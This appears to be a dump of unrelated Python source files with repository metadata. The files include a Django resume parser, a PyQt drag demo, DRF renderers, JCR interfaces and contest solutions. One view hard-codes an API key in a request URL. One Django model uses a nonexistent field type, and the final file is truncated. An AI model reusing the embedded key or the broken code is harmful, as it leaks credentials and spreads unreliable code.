        files = request.FILES.getlist('resume')
        if file_form.is_valid():
            for file in files:
                try:
                    user = User.objects.get(id=1)
                    # saving the file
                    resume = Resume(user=user, resume=file)
                    resume.save()
                    # extracting resume entities
                    parser = resume_parser.ResumeParser(os.path.join(settings.MEDIA_ROOT, resume.resume.name))
                    data = parser.get_extracted_data()
                    # User Details
                    # resume.name = data.get('name')
                    # resume.email = data.get('email')
                    # resume.education = get_education(data.get('education'))
                    user_details = UserDetails()
                    user_details.user = user
                    user_details.name = data.get('name')
                    user_details.email = data.get('email')
                    user_details.mobile_number = data.get('mobile_number')
                    user_details.skills = ', '.join(data.get('skills'))
                    user_details.years_of_exp = data.get('total_experience')
                    user_details.save()
                    # One row per extracted competency / measurable result.
                    for comp in data.get('competencies'):
                        competencies = Competencies()
                        competencies.user = user
                        competencies.competency = comp
                        competencies.save()
                    for mr in data.get('measurable_results'):
                        measurable_results = MeasurableResults()
                        measurable_results.user = user
                        measurable_results.measurable_result = mr
                        measurable_results.save()
                    # Resume Details
                    resume_details = ResumeDetails()
                    resume_details.resume = resume
                    resume_details.page_nos = data.get('no_of_pages')
                    resume_details.save()
                    # resume.experience = ', '.join(data.get('experience'))
                    # measurable_results.append(data.get('measurable_results'))
                    # resume.save()
                except IntegrityError:
                    # NOTE(review): third positional arg of messages.warning
                    # is extra_tags, so file.name is not appended to the
                    # message text — confirm intent.
                    messages.warning(request, 'Duplicate resume found:', file.name)
                    return redirect('homepage')
        resumes = Resume.objects.filter(user=User.objects.get(id=1))
        user_detail = UserDetails.objects.get(user=user)
        messages.success(request, 'Resumes uploaded!')
        # Scores come from the *last* parsed resume's extraction dict.
        overall_score = 0
        competencies = data.get('competencies')
        measurable_results = data.get('measurable_results')
        if competencies and measurable_results:
            overall_score = competencies.get('score') + measurable_results.get('score')
        if competencies:
            context = {
                'resumes': resumes,
                'competencies': competencies,
                'measurable_results': measurable_results,
                'no_of_pages': data.get('no_of_pages'),
                'total_experience': data.get('total_experience'),
                'user_details': user_detail,
                'overall_score': overall_score
            }
        else:
            context = {
                'resumes': resumes,
                'competencies': [],
                'measurable_results': [],
                'no_of_pages': data.get('no_of_pages'),
                'total_experience': data.get('total_experience'),
                'user_details': user_detail,
                'overall_score': overall_score
            }
        return render(request, 'base.html', context)
    else:
        form = UploadResumeModelForm()
        return render(request, 'base.html', {'form': form})
def get_education(education):
    '''
    Helper function to display the education in human readable format:
    (degree, year) pairs become "degree (year)", comma-separated.
    '''
    parts = [f"{degree} ({year})" for degree, year in education]
    return ', '.join(parts)
@csrf_exempt
def user_detail(request, pk):
    """
    GET-only endpoint: return all stored details for user `pk` as JSON
    (user details, competencies, measurable results, resume + metadata).
    Returns 404 if the user's details or competencies are missing.
    """
    # NOTE(review): non-GET requests fall through and implicitly return
    # None, which Django rejects — confirm whether other verbs are needed.
    try:
        user = User.objects.get(pk=pk)
        user_details = UserDetails.objects.get(user=user)
        comp = Competencies.objects.filter(user=user)
        mr = MeasurableResults.objects.filter(user=user)
        resume = Resume.objects.get(user=user)
        resume_details = ResumeDetails.objects.filter(resume=resume)
    except UserDetails.DoesNotExist:
        return HttpResponse(status=404)
    except Competencies.DoesNotExist:
        return HttpResponse(status=404)
    if request.method == 'GET':
        # Serialize every related record set and bundle them in one dict.
        comp_serializer = CompetenciesSerializer(comp, many=True)
        mr_serializer = MeasurableResultsSerializer(mr, many=True)
        resume_serializer = ResumeSerializer(resume)
        resume_details_serializer = ResumeDetailsSerializer(resume_details, many=True)
        user_details_serializer = UserDetailsSerializer(user_details)
        data = {}
        data['competencies'] = comp_serializer.data
        data['measurable_results'] = mr_serializer.data
        data['resume'] = resume_serializer.data
        data['resume_details'] = resume_details_serializer.data
        data['user_details'] = user_details_serializer.data
        return JsonResponse(data)
@csrf_exempt
def job_recommendation(request):
    """POST endpoint that proxies a job search to the ZipRecruiter API."""
    if request.method == 'POST':
        # NOTE(review): job_title/job_location are read but never used —
        # the outgoing query string is hard-coded, and the API key is
        # embedded in source. Both look like placeholders to fix.
        job_title = request.POST.get('job_title')
        job_location = request.POST.get('job_location')
        data = requests.get('https://api.ziprecruiter.com/jobs/v1?search=Python&location=Santa%20Monica&api_key=mqpqz4ev44nfu3n9brazrrix27yzipzm').json()
        return JsonResponse(data)
|
[
"omkarpathak27@gmail.com"
] |
omkarpathak27@gmail.com
|
67269e55398033362ab23e10f0576fc5aeae98ab
|
2e1b5bd2d33f0beb965be77f1de2ae035c491125
|
/chapter4/qt04_drag.py
|
f30b52e75694194da80bf8c948af65dfb20391a1
|
[] |
no_license
|
mandeling/PyQt5-1
|
1cf6778e767e5746640aa0458434751a226a2383
|
9334786e70b2657e0f94b6dad4714f2aa239d0cd
|
refs/heads/master
| 2020-05-07T19:08:40.072960
| 2019-04-11T10:44:48
| 2019-04-11T10:44:48
| 180,799,901
| 1
| 0
| null | 2019-04-11T13:37:55
| 2019-04-11T13:37:55
| null |
UTF-8
|
Python
| false
| false
| 887
|
py
|
import sys
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
class Combo(QComboBox):
    """A QComboBox that accepts text drops and appends them as items."""
    def __init__(self, title, parent):
        # `title` is accepted for API symmetry but not used here.
        super(Combo, self).__init__(parent)
        self.setAcceptDrops(True)
    def dragEnterEvent(self, e):
        print(e)
        # Accept only plain-text payloads; refuse everything else.
        if e.mimeData().hasText():
            e.accept()
        else:
            e.ignore()
    def dropEvent(self, e):
        # The dropped text becomes a new combo-box entry.
        self.addItem(e.mimeData().text())
class Example(QWidget):
    """Demo window: drag text from a line edit into a drop-enabled combo box."""
    def __init__(self):
        super(Example, self).__init__()
        self.initUI()
    def initUI(self):
        # Form layout: instruction label on top, then the drag source
        # (QLineEdit) next to the drop target (Combo).
        lo = QFormLayout()
        lo.addRow(QLabel('请把左边的文本拖曳到右边的下拉菜单中'))
        edit = QLineEdit()
        edit.setDragEnabled(True)
        com = Combo('Button', self)
        lo.addRow(edit, com)
        self.setLayout(lo)
        self.setWindowTitle('简单的拖曳例子')
if __name__ == '__main__':
    # Standard Qt bootstrap: create the application, show the window,
    # and hand control to the event loop.
    app = QApplication(sys.argv)
    ex = Example()
    ex.show()
    sys.exit(app.exec())
|
[
"sqw123az@sina.com"
] |
sqw123az@sina.com
|
c33c5d21ce909bc806b78c0dde5a40c39d15fbd5
|
00d7e9321d418a2d9a607fb9376b862119f2bd4e
|
/utils/pdf_figure_stamper.py
|
4628dbee41fd552c97249ac0bbeb5cd6de0b08e4
|
[
"MIT"
] |
permissive
|
baluneboy/pims
|
92b9b1f64ed658867186e44b92526867696e1923
|
5a07e02588b1b7c8ebf7458b10e81b8ecf84ad13
|
refs/heads/master
| 2021-11-16T01:55:39.223910
| 2021-08-13T15:19:48
| 2021-08-13T15:19:48
| 33,029,780
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,335
|
py
|
#!/usr/bin/env python
import os
from pims.files.pdfs.pdfjam import CpdfAddTextCommand
from pims.files.utils import listdir_filename_pattern
# return list of PDF files matching filename pattern criteria (not having STAMPED in filename)
def get_pdf_files(dirpath, fname_pat):
    """return list of PDF files for this drop number (i.e. drop dir)"""
    # Skip outputs of a previous run, whose names contain "STAMPED".
    matches = listdir_filename_pattern(dirpath, fname_pat)
    return [name for name in matches if "STAMPED" not in name]
if __name__ == "__main__":
    # get list of analysis template plot PDFs
    # (this file is Python 2: note the print statement below)
    sensor = '121f02'
    sensor_suffix = '010'
    fname_pat = '.*' + sensor + sensor_suffix + '_gvtm_pops_.*_EML_analysis.pdf'
    dirpath = '/home/pims/dev/matlab/programs/special/EML/hb_vib_crew_Vehicle_and_Crew_Activity/plots'
    pdf_files = sorted(get_pdf_files(dirpath, fname_pat))
    c = 0
    for f in pdf_files:
        c += 1
        print 'page %02d %s' % (c, f)
        #cpdf -prerotate -add-text "${F}" ${F} -color "0.5 0.3 0.4" -font-size 6 -font "Courier" -pos-left "450 5" -o ${F/.pdf/_cpdf_add-text.pdf}
        # Stamp each PDF with its own file name via the cpdf wrapper command.
        color = "0.5 0.3 0.4"
        font = "Courier"
        font_size = 6
        pos_left = "450 5"
        cat = CpdfAddTextCommand(f, color, font, font_size, pos_left)
        cat.run()
|
[
"silversnoopy2002@gmail.com"
] |
silversnoopy2002@gmail.com
|
116c66d9f3c1b4f5e2c4991742de3a8413bbff56
|
854b220c25dc886f77c237437c370782a68c8bb2
|
/proyectos_de_ley/api/api_responses.py
|
f94452466a9934b2e9df3b1b8c8aaa98a4e6592c
|
[
"MIT"
] |
permissive
|
MrBaatezu/proyectos_de_ley
|
b6bb672b5bcc3c8ca2b6327ee96083466356560d
|
56cf6f2f1df6483d2057235132a376b068877407
|
refs/heads/master
| 2021-01-18T01:10:12.683082
| 2015-10-29T00:44:52
| 2015-10-29T00:44:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 975
|
py
|
from django.http import HttpResponse
from rest_framework.renderers import JSONRenderer
from rest_framework_csv import renderers
class JSONResponse(HttpResponse):
    """
    An HttpResponse that renders its content into JSON.
    """
    def __init__(self, data, **kwargs):
        # Serialize with DRF's JSONRenderer and force the JSON content type.
        content = JSONRenderer().render(data)
        kwargs['content_type'] = 'application/json'
        super(JSONResponse, self).__init__(content, **kwargs)
class CSVResponse(HttpResponse):
    """
    An HttpResponse that renders its content into CSV.
    """
    def __init__(self, data, **kwargs):
        # Serialize with the module's CSVRenderer and force the CSV content type.
        content = CSVRenderer().render(data)
        kwargs['content_type'] = 'text/csv'
        super(CSVResponse, self).__init__(content, **kwargs)
class CSVRenderer(renderers.CSVRenderer):
    """CSV renderer declaring an explicit media type and format name."""
    media_type = 'text/csv'
    format = 'csv'
    def render(self, data, media_type=None, renderer_context=None):
        # NOTE(review): this override just forwards the same arguments to
        # the parent and could be deleted without changing behavior.
        return super(CSVRenderer, self).render(data, media_type, renderer_context)
|
[
"aniversarioperu1@gmail.com"
] |
aniversarioperu1@gmail.com
|
efecd6e8598ad283a82bc7fe6aab0b6dec4ceea3
|
5c333d9afed7ecf1feba34c41764184b70f725ea
|
/scripts/test.py
|
22d789f0c247add83cb748c9a559e96f2bcd14b5
|
[] |
no_license
|
NMGRL/pychrondata
|
4e3573f929b6a465fa959bfe5b5bdfe734514b8c
|
0d805ca6b7e5377f253d80ad93749b1d4253cb50
|
refs/heads/master
| 2020-12-24T16:35:39.308745
| 2016-03-09T18:37:47
| 2016-03-09T18:37:47
| 15,424,677
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 344
|
py
|
#!Extraction
def main():
    '''
    start at 0 zoom
    focus
    take picture
    increment zoom
    take picture
    start at 100 zoom
    focus
    take picture....
    '''
    # info() is provided by the pychron extraction-script runtime;
    # it is not defined in this file.
    for i in range(10):
        info('info {}'.format(i))
|
[
"jirhiker@gmail.com"
] |
jirhiker@gmail.com
|
16d51e454824f67b4b41ef3ca55f13c9e221bf28
|
81fe7f2faea91785ee13cb0297ef9228d832be93
|
/HackerRank/ajob_subsequence_bis.py
|
71a54d19dcac4f7ce8161b46f701309c0454498c
|
[] |
no_license
|
blegloannec/CodeProblems
|
92349c36e1a35cfc1c48206943d9c2686ea526f8
|
77fd0fa1f1a519d4d55265b9a7abf12f1bd7d19e
|
refs/heads/master
| 2022-05-16T20:20:40.578760
| 2021-12-30T11:10:25
| 2022-04-22T08:11:07
| 54,330,243
| 5
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 783
|
py
|
#!/usr/bin/env python3
# cf ajob_subsequence.py
# Method 2: using Lucas's theorem
def digits(n):
    """Return the base-P digits of n, least significant first (P is a module global)."""
    D = []
    while n:
        n,d = divmod(n,P)
        D.append(d)
    return D
def inv(n):
    """Modular inverse of n mod P via Fermat's little theorem (P must be prime)."""
    return pow(n,P-2,P)
def binom(n,p):
    """C(n, p) mod P for digit-sized arguments, using the precomputed table Fact."""
    if 0<=p<=n:
        return (Fact[n] * inv((Fact[p]*Fact[n-p])%P)) % P
    return 0
def binom_lucas(n,k):
    """C(n, k) mod P by Lucas's theorem: product of C(ni, ki) over base-P digits."""
    assert 0<=k<=n
    Dn = digits(n)
    Dk = digits(k)
    # Pad k's digit list so both numbers have the same digit count.
    while len(Dk)<len(Dn):
        Dk.append(0)
    res = 1
    for ni,ki in zip(Dn,Dk):
        res = (res * binom(ni,ki)) % P
    return res
if __name__=='__main__':
    T = int(input())
    for _ in range(T):
        # Each query supplies its own prime modulus P, so the factorial
        # table Fact is rebuilt per query.
        N,K,P = map(int,input().split())
        Fact = [1]*P
        for i in range(2,P):
            Fact[i] = (Fact[i-1]*i) % P
        print(binom_lucas(N+1,K+1))
|
[
"blg@gmx.com"
] |
blg@gmx.com
|
1eb2f715857b7860d37606c858a8ac2c834a2f58
|
87fb0ae5563512bf4cfe2754ea92e7f4173f753f
|
/Chap_08/Ex_181.py
|
ba2d1b32e7dabdca85b694f6e4635d4a64b0e168
|
[] |
no_license
|
effedib/the-python-workbook-2
|
87291f5dd6d369360288761c87dc47df1b201aa7
|
69532770e6bbb50ea507e15f7d717028acc86a40
|
refs/heads/main
| 2023-08-21T13:43:59.922037
| 2021-10-12T20:36:41
| 2021-10-12T20:36:41
| 325,384,405
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,247
|
py
|
# Possible Change
# Read both the dollar amount and the number of coins from user and display a message indicating whether or not the
# entered amount can be formed using the number of coins indicated.
def possibleChange(dollars, coins, index=0):
    """Return True iff `dollars` can be formed using exactly `coins` US coins.

    Coins available: quarters, dimes, nickels, pennies. The amount is
    rounded to whole cents before checking.

    `index` is kept only for backward compatibility with the old recursive
    signature; it is ignored.

    Bug fix: the previous greedy implementation gave wrong answers — e.g.
    it reported that $0.25 cannot be made with 5 coins, although five
    nickels work. This version does an exhaustive memoized search with
    bound pruning, which is exact.
    """
    from functools import lru_cache

    cents = round(dollars * 100)

    @lru_cache(maxsize=None)
    def feasible(amount, remaining):
        # Exactly `remaining` coins must sum to `amount` cents.
        if remaining == 0:
            return amount == 0
        # Pruning: each coin is worth between 1 and 25 cents.
        if amount < remaining or amount > 25 * remaining:
            return False
        return any(feasible(amount - c, remaining - 1)
                   for c in (25, 10, 5, 1) if c <= amount)

    return feasible(cents, coins)
def main():
    """Read an amount and a coin budget, then report, for every coin count
    from 1 up to the budget, whether the amount can be formed.

    Bug fix: the loop previously evaluated possibleChange(total, coin) —
    the fixed budget — on every iteration instead of the loop variable i,
    printing the same result `coin` times.
    """
    total = float(input('Enter the total amount: '))
    coin = int(input('How many coins do you want to use? '))
    for i in range(1, coin + 1):
        print("{} coins:\t{}".format(i, possibleChange(total, i)))
if __name__ == "__main__":
    main()
|
[
"cicciodb@hotmail.it"
] |
cicciodb@hotmail.it
|
33516c24ec951e32d2454058cccb932ff632af1d
|
9855a6472fa9cd0a0ed75d5d1110eb5450e38c35
|
/django_mailbox/runtests.py
|
f5b0ff3b0c41ddd22e10232d108f622b41e04984
|
[] |
no_license
|
JessAtBlocBoxCo/blocbox
|
efef025333b689e4c9e0fb6a7bfb2237fcdc72a0
|
0966fd0ba096b2107bd6bd05e08c43b4902e6ff2
|
refs/heads/master
| 2020-04-11T04:30:25.792700
| 2015-09-22T04:41:34
| 2015-09-22T04:41:34
| 23,008,502
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,117
|
py
|
#!/usr/bin/env python
import sys
from os.path import dirname, abspath
try:
from django import setup
except ImportError:
pass
from django.conf import settings
if not settings.configured:
settings.configure(
DATABASES={
'default': {
'ENGINE': 'django.db.backends.sqlite3',
},
},
INSTALLED_APPS=[
'django.contrib.auth',
'django.contrib.contenttypes',
'django_mailbox',
]
)
from django.test.simple import DjangoTestSuiteRunner
def runtests(*test_args):
    """Run the django_mailbox test suite and exit with the failure count.

    Defaults to the 'django_mailbox' app when no test labels are given.
    """
    if not test_args:
        test_args = ['django_mailbox']
    # Make this package importable regardless of the working directory.
    parent = dirname(abspath(__file__))
    sys.path.insert(0, parent)
    try:
        # ensure that AppRegistry has loaded
        setup()
    except NameError:
        # This version of Django is too old for an app registry.
        pass
    runner = DjangoTestSuiteRunner(
        verbosity=1,
        interactive=False,
        failfast=False
    )
    failures = runner.run_tests(test_args)
    sys.exit(failures)
if __name__ == '__main__':
    runtests(*sys.argv[1:])
|
[
"jess@blocbox.co"
] |
jess@blocbox.co
|
15a59428a27529aafc46c577811104b43b63a731
|
460027c62df6a6939c342d2d2f49a727c8fc955c
|
/src/nuxeo/jcr/interfaces.py
|
0cd0ba5c447f9981fb9a2c9e36f5c777740674bf
|
[] |
no_license
|
nuxeo-cps/zope3--nuxeo.jcr
|
ef6d52272835fa14375308bf5a51dbee68b2252a
|
88e83d30232226ad71b6f24a2c00e5ad9ba5e603
|
refs/heads/main
| 2023-01-23T19:56:27.515465
| 2006-10-20T16:54:01
| 2006-10-20T16:54:01
| 317,994,526
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,597
|
py
|
##############################################################################
#
# Copyright (c) 2006 Nuxeo and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
# Author: Florent Guillaume <fg@nuxeo.com>
# $Id$
"""Capsule JCR interfaces.
"""
from zope.interface import Interface
from ZODB.POSException import ConflictError # for reimport
class ProtocolError(ValueError):
pass
class IJCRController(Interface):
"""Commands between Zope and the JCR bridge.
All commands are synchronous.
The commands may also return JCR events, if some have been sent.
They are accumulated and can be read by ``getPendingEvents()``.
"""
def connect():
"""Connect the controller to the server.
"""
def login(workspaceName):
"""Login to a given workspace.
This is the first command sent. It creates a session on the
JCR side and puts it into a transaction.
Returns the root node UUID.
"""
def prepare():
"""Prepare the current transaction for commit.
May raise a ConflictError.
"""
def commit():
"""Commit the prepared transaction, start a new one.
"""
def abort():
"""Abort the current transaction, start a new one.
"""
def checkpoint(uuid):
"""Checkpoint: checkin and checkout
"""
def restore(uuid, versionName=''):
"""Restore a node.
Return list of uuids to deactivate.
"""
def getNodeTypeDefs():
"""Get the schemas of the node type definitions.
Returns a string containing a set of CND declarations.
System types may be omitted.
"""
def getNodeType(uuid):
"""Get the type of a node.
"""
def getNodeStates(uuids):
"""Get the state of several nodes.
Additional node states may be returned, to improve network
transfers.
Returns a mapping of UUID to a tuple (`name`, `parent_uuid`,
`children`, `properties`, `deferred`).
- `name` is the name of the node,
- `parent_uuid` is the UUID of the node's parent, or None if
it's the root,
- `children` is a sequence of tuples representing children
nodes, usually (`name`, `uuid`, `type`), but for a child with
same-name siblings, (`name`, [`uuid`s], `type`),
- `properties` is a sequence of (`name`, `value`),
- `deferred` is a sequence of `name` of the remaining deferred
properties.
An error is returned if there's no such UUID.
"""
def getNodeProperties(uuid, names):
"""Get the value of selected properties.
Returns a mapping of property name to value.
An error is returned if the UUID doesn't exist or if one of the
names doesn't exist as a property.
"""
def sendCommands(commands):
"""Send a sequence of modification commands to the JCR.
`commands` is an iterable returning tuples of the form:
- 'add', parent_uuid, name, node_type, props_mapping, token
- 'modify', uuid, props_mapping
- 'remove', uuid
- 'order' XXX
A JCR save() is done after the commands have been sent.
Returns a mapping of token -> uuid, which gives the new UUIDs
for created nodes.
"""
def getPendingEvents():
"""Get pending events.
The pending events are sent asynchronously by the server and
accumulated until read by this method.
"""
def getPath(uuid):
"""Get the path of a given UUID.
Returns the path or None.
The path is relative to the JCR workspace root.
"""
def searchProperty(prop_name, value):
"""Search the JCR for nodes where prop_name = 'value'.
Returns a sequence of (uuid, path).
The paths are relative to the JCR workspace root.
"""
def move(uuid, dest_uuid, name):
"""Move the document to another container.
"""
def copy(uuid, dest_uuid, name):
"""Copy the document to another container.
"""
|
[
"devnull@localhost"
] |
devnull@localhost
|
3aaf3331c8160b13805128f0a48758614d163f12
|
e5f7d7706062b7807daafaf5b670d9f273440286
|
/stocks/admin.py
|
3da94a24279993788e7694d3af8b4fe75814404d
|
[] |
no_license
|
fchampalimaud/flydb
|
bd01839c163aa34277091f454f8ad38e3fd45dc4
|
2d3ad9ff5903a26070258f707228334cd765a647
|
refs/heads/master
| 2021-06-17T15:38:25.517946
| 2018-01-17T16:16:00
| 2018-01-17T16:16:00
| 185,334,467
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 206
|
py
|
from pathlib import Path
from django.contrib import admin
from django.apps import apps
app = apps.get_app_config(Path(__file__).parent.name)
for model in app.get_models():
admin.site.register(model)
|
[
"hugo.cachitas@research.fchampalimaud.org"
] |
hugo.cachitas@research.fchampalimaud.org
|
74f037f36854ed429ba78246687bfa075c1ec9b2
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_206/689.py
|
ade9216b11543d12d4e0795d77c30c952d9e8947
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,062
|
py
|
from itertools import \
product, \
permutations, \
combinations, \
combinations_with_replacement
from functools import reduce, lru_cache
from math import floor,ceil,inf,sqrt
def intercept_time(i,j):
if i[1] == j[1]:
return inf
else:
return (j[0]-i[0])/(i[1]-j[1])
def intercept_distance(i,j):
if intercept_time(i,j) < 0:
return inf
else:
return intercept_time(i,j)*i[1] + i[0]
def solve(D, horses):
horses.sort()
while len(horses) > 1:
if intercept_distance(horses[-2], horses[-1]) < D:
del horses[-2]
else:
del horses[-1]
return D / intercept_time(horses[0], (D,0))
if __name__ == '__main__':
import sys,re
data = iter(sys.stdin.read().splitlines())
T = int(next(data))
for (case_num, case) in enumerate(data):
D,N = map(int, case.split())
horses = []
for _ in range(N):
horses.append(tuple(map(int, next(data).split())))
print('Case #{}: {}'.format(case_num+1, solve(D, horses)))
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
d6886e124c6a5e23cfe5c3167ad569f20e55a369
|
3cedb583e9f3dfcdf16aeba56a0b3ff7c6213e99
|
/python-codes/m2_curso_em_video_estruturas_de_controle/ex048.0.py
|
7c2fd6a5930cb1648fc94bfe1920cee6b20f008b
|
[
"MIT"
] |
permissive
|
lucasportella/learning-python
|
0f39ae2389db6d07b5b8c14ebe0c24f1e93c77c5
|
a9449dffd489e7e1f1619e3acef86bc2c64f0f14
|
refs/heads/master
| 2022-12-26T15:04:12.806300
| 2020-10-14T23:17:47
| 2020-10-14T23:17:47
| 260,685,503
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 273
|
py
|
soma = 0
somaPA = 0
print('Todos os números ímpares múltiplos de 3 até 500:')
for cont in range(1,501,2):
if cont % 3 == 0:
soma += 1
somaPA += cont
print(cont,end=' ')
print('\n Número de repetições:', soma)
print('Soma da PA:', somaPA)
|
[
"lucasportellaagu@gmail.com"
] |
lucasportellaagu@gmail.com
|
e45a1fac5b581c35a286bd8251ccc0e3f6475205
|
ee4a0698f75aa2500bf2ce1b5e5331bc8b57157a
|
/myproject/course/models.py
|
738e4fda86e0a0457361f274b8a857115dd7a817
|
[] |
no_license
|
coderrohanpahwa/one_to_one_model
|
5398732410027bfad91c5d5db01e528397c87703
|
df4fd8ce89d74d41d49671ba8dd5759b80af3d43
|
refs/heads/main
| 2022-12-25T14:12:31.253350
| 2020-10-06T08:58:38
| 2020-10-06T08:58:38
| 301,669,111
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 239
|
py
|
from django.db import models
from django.contrib.auth.models import User
from .views import k
# Create your models here.
class Answer(models.Model):
user=models.OneToMany(User,models.CASCADE)
answer=models.CharField(max_length=100)
|
[
"coderrohanpahwa@gmail.com"
] |
coderrohanpahwa@gmail.com
|
e123eb5ce78814907f4c0576ae6dc701c3f31bc2
|
c105570f12f1d56087ffb831f5d34cd763d6c90b
|
/top/api/rest/WlbWaybillIQuerydetailRequest.py
|
e31f3da969397463b9eaf5940b3a4f8b3c5c3026
|
[] |
no_license
|
wjianwei126/Alinone
|
01607423833d7736b2fd3c77e9e21f63c69b4e4c
|
80144d4657cb049d651c09647eb245405240f12f
|
refs/heads/master
| 2020-12-07T05:14:58.746777
| 2015-05-06T12:48:33
| 2015-05-06T12:48:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 346
|
py
|
'''
Created by auto_sdk on 2014-11-09 14:51:18
'''
from top.api.base import RestApi
class WlbWaybillIQuerydetailRequest(RestApi):
def __init__(self,domain='gw.api.taobao.com',port=80):
RestApi.__init__(self,domain, port)
self.waybill_detail_query_request = None
def getapiname(self):
return 'taobao.wlb.waybill.i.querydetail'
|
[
"rapospectre@0163.com"
] |
rapospectre@0163.com
|
d0f1683880dd97dbf57a8ff8ca500f4470b5aa9f
|
a42ed872908291bbfc5ae2f68968edc4c47edfcf
|
/lesson_16/choices_test.py
|
8c1ac0adaa1e1dc47e02cf3b312e2d5874927c43
|
[] |
no_license
|
antonplkv/itea_advanced_august
|
b87f48cc48134ce1a73e167a5c834322792d0167
|
265c124e79747df75b58a1fd8c5d13605c1041b2
|
refs/heads/master
| 2023-01-02T23:31:39.050216
| 2020-10-28T19:15:01
| 2020-10-28T19:15:01
| 291,792,884
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 660
|
py
|
import mongoengine as me
me.connect('testtetsttetst')
class Task(me.Document):
LOW_PRIORITY = 1
MEDIUM_PRIORITY = 2
HIGH_PRIORITY = 3
PRIORITIES = (
(LOW_PRIORITY, 'Низкий приоритет'),
(MEDIUM_PRIORITY, 'Средний приоритет'),
(HIGH_PRIORITY, 'Высокий приоритет')
)
INSIDE_CATEGORY = 1
OUTSIDE_CATEGORY = 2
CATEGORIES = (
(INSIDE_CATEGORY, 'Проблема в магазине'),
(OUTSIDE_CATEGORY, 'Проблема на складе'),
)
priority = me.IntField(choices=PRIORITIES)
category = me.IntField(choices=CATEGORIES)
|
[
"polyakov.anton@ukr.net"
] |
polyakov.anton@ukr.net
|
10f47f80b7c9c1ebf1af1c941dbe2dbbc69c281d
|
a5b4384d1eaef17875499a3f721fedb91afa9fba
|
/usr/app/wsgi/tests/test_identification.py
|
4b2a91ae1772c81ee9d77f68ffac95c017821d1e
|
[] |
no_license
|
wizardsofindustry/quantum-usr
|
85f609b8c08264d69204f696bea0446df19f0eb6
|
d49a3dcdf4df2ce31324f5ec98ae5c7130e01cbb
|
refs/heads/master
| 2021-07-18T06:51:16.034613
| 2018-11-23T19:20:23
| 2018-11-23T19:25:16
| 136,974,755
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,983
|
py
|
import unittest
import ioc
import sq.test
import sq.lib.x509
from ....infra import orm
from ..endpoints import IdentificationEndpoint
@sq.test.integration
class X509SubjectIdentificationTestCase(sq.test.SystemTestCase):
gsid ="00000000-0000-0000-0000-000000000000"
metadata = orm.Relation.metadata
def setUp(self):
super(X509SubjectIdentificationTestCase, self).setUp()
self.endpoint = IdentificationEndpoint()
self.service = ioc.require('SubjectIdentificationService')
with open('dev/usr.testing.crt', 'rb') as f:
self.pem = f.read()
self.crt = sq.lib.x509.Certificate.frompem(self.pem)
self.service.associate(self.gsid,
{'type': 'x509', 'crt': bytes.hex(self.pem)})
@unittest.skip
def test_subject_is_identified_by_email(self):
"""Identify a Subject by email."""
request = sq.test.request_factory(
method='POST',
json=[{
'type': 'email',
'email': "cochise.ruhulessin@wizardsofindustry.net"
}]
)
response = self.run_callable(self.loop, self.endpoint.handle, request)
def test_subject_is_identified_by_x509(self):
"""Identify a Subject by X.509 certificate."""
dto = {
'type': 'x509',
'crt': bytes.hex(self.pem)
}
request = self.request_factory(method='POST', json=dto)
response = self.run_callable(self.loop, self.endpoint.handle, request)
self.assertEqual(response.status_code, 200)
def test_unknown_principal_type_returns_404(self):
"""Identify a Subject by X.509 certificate."""
dto = {
'type': 'foo',
'crt': bytes.hex(self.pem)
}
request = self.request_factory(method='POST', json=dto)
response = self.run_callable(self.loop, self.endpoint.handle, request)
self.assertEqual(response.status_code, 404)
#pylint: skip-file
|
[
"cochise.ruhulessin@wizardsofindustry.net"
] |
cochise.ruhulessin@wizardsofindustry.net
|
e9a512b76683460e70e8f31c4ae4f2d4f5144fb0
|
62c613e1f2bf062f807294ec6da4ae35bda6ac86
|
/abc146-d.py
|
195a5dc74cc33e8cfd7bc84c234a493644e42d2a
|
[] |
no_license
|
teru01/python_algorithms
|
6b463c78c801b68f93dda2be2f67c9688dc3cc07
|
8feb194f53b619ab7b9c964a32df7b4df32b6f2e
|
refs/heads/master
| 2020-06-11T02:33:27.939830
| 2020-04-27T01:32:37
| 2020-04-27T01:32:37
| 193,827,088
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,178
|
py
|
import sys
input = sys.stdin.readline
from operator import itemgetter
sys.setrecursionlimit(10000000)
INF = 10**30
from collections import deque
def main():
n = int(input().strip())
G = [[] for _ in range(n)]
A = [0] * n
B = [0] * n
for i in range(n-1):
a, b = list(map(int, input().strip().split()))
A[i] = a
B[i] = b
G[a-1].append([b-1, 0])
G[b-1].append([a-1, 0])
root = 0
mlen = len(G[0])
for i in range(n):
if mlen < len(G[i]):
